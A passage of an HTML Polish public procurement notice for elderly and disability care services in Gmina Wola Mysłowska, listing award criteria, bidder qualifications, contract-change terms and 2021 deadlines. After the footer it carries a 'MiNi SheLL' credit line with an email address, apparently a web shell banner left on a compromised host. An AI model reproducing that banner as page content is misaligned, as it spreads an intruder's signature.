30.04.2023 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C +<br/>D+ AS. Maksymalna liczba punktów w kryterium „cena” , „doświadczenie” i „ aspekt społeczny”.<br/>Kryteria oceny ofert nie podlegają zmianie podczas ich badania. Zamawiający ocenia ofertę do dwóch<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>miejsc po przecinku. Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę<br/>punktów w wyniku oceny ofert w zakresie danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt społeczny - zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> - zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>- uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>-. uprawnień sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/>- zdolności technicznej lub zawodowej w zakresie:<br/>- Część I-III zamówienia: Zamawiający żąda przedstawienia wykazu osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami;- zał. Nr 4<br/>Zamawiający uzna za warunek spełniony, jeżeli Wykonawca będzie dysponował przynajmniej 1<br/>osobą na realizację każdej z części zamówienia, która będzie posiadać potrzebne kwalifikacje,<br/>uprawnienia, doświadczenie niezbędne do wykonania zamówienia tj.: Usługa opiekuńcza może<br/>być świadczona przez:<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>a) osobę, która posiada kwalifikacje do wykonywania jednego z zawodów: opiekun<br/>środowiskowy, asystent osoby niepełnosprawnej, pielęgniarz, opiekun osoby starszej, opiekun<br/>medyczny, opiekun kwalifikowany w domu pomocy społecznej,<br/>b) osobę, która posiada doświadczenie w realizacji usług opiekuńczych, w tym zawodowe,<br/>wolontariackie lub osobiste wynikające z pełnienia roli opiekuna faktycznego i odbyła minimum<br/>80-godzinne szkolenie z zakresu realizowanej usługi, w tym udzielania pierwszej pomocy lub<br/>pomocy przedmedycznej<br/>- Część I- III zamówienia:<br/>-wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3lat, a jeżeli okres prowadzenia działalności jest krótszy –w<br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi<br/>zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wystawione w okresie ostatnich 3 miesięcy zgodnie z zał. Nr 5<br/>Zamawiający uzna warunek opisany wyżej za spełniony jeżeli Wykonawca w okresie ostatnich<br/>trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie zrealizował co najmniej 1<br/>usługę, a w przypadku świadczeń powtarzających się lub ciągłych wykonuje co najmniej 1<br/>usługę polegającą na świadczeniu usług opiekuńczych w wymiarze min. 40 h.<br/>UWAGA!<br/>• Okresy wyrażone w latach i miesiącach o których mowa w ust. 1 pkt 4 liczy się wstecz od dnia<br/>w którym upływa termin składania ofert.<br/>• Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z<br/>innymi wykonawcami, wykaz o którym mowa w ust.1 pkt 4 dotyczy usług, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub<br/>ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>dotyczy części I-III zamówienia<br/>- wykazu osób skierowanych do realizacji usług zgodnie z zał. Nr 4 do SWZ opisanym w rozdz. VI ust.<br/>6.1.4 tiret pierwszy<br/>- wykaz usług zgodnie z zał. Nr 5 do SWZ opisanym w rozdz. VI ust. 6.1.4 tiret drugi</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia<br/>z udziału w postępowaniu: dotyczy części I-III zamówienia<br/>Zamawiający nie żąda dokumentów na potwierdzenie braku podstaw wykluczenia</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w<br/>zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy<br/>wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 10<br/>do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/> w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku<br/> w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy<br/>1. Niedopuszczalne są istotne zmiany postanowień Umowy o których mowa w art. 454 ustawy<br/>Pzp.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w<br/>stosunku do udzielonego zamówienia, stosownie do art. 455 ustawy Pzp w przypadku:<br/>1) zmian wynagrodzenia opisanych § 7 ust. 1 pkt. 1-4 i ust. 10-14<br/>2) zmiany terminu - w przypadku konieczności wydłużenia terminu obowiązywania umowy<br/>(realizacji zamówienia), o okres nie dłuższy niż trzy miesiące (przy czym ilość godzin usług dla<br/>każdej z części nie ulegnie zmianie)<br/>3) zmiany osób skierowanych przez Wykonawcę do realizacji usług, osoba zastępująca winna<br/>spełniać wszystkie wymogi opisane w SWZ i wskazane w ofercie w stopniu nie mniejszym, niż<br/>na podstawie których oferta wykonawcy została uznana jako najkorzystniejsza.<br/>3. Nie stanowi zmiany umowy:<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr<br/>rachunku bankowego),<br/>2) zmiany danych tele-adresowych, zmiany osób wskazanych do kontaktów między Stronami,<br/>3) zmiana wykazu osób o którym mowa § 8 ust. 1 niniejszej umowy<br/>4.Zmiany może inicjować każda ze stron umowy wyłącznie w formie pisemnej, określając<br/>warunki jej dokonania, biorąc pod uwagę w szczególności:<br/>1) opis zmiany,<br/>2) uzasadnienie zmiany,<br/>3) koszt zmiany i sposób jego wyliczenia,<br/>4) wpływ zmiany na wysokość wynagrodzenia,<br/>5) czas wykonania zmiany,<br/>6) wpływ zmiany na termin zakończenia wykonania zamówienia,<br/>5.Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6.Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie<br/>aneksu podpisanego przez obie strony, pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem platformy e-zamawiajacy, w Urzędzie Gminy Wola Mysłowska pok. nr 8</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-04</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com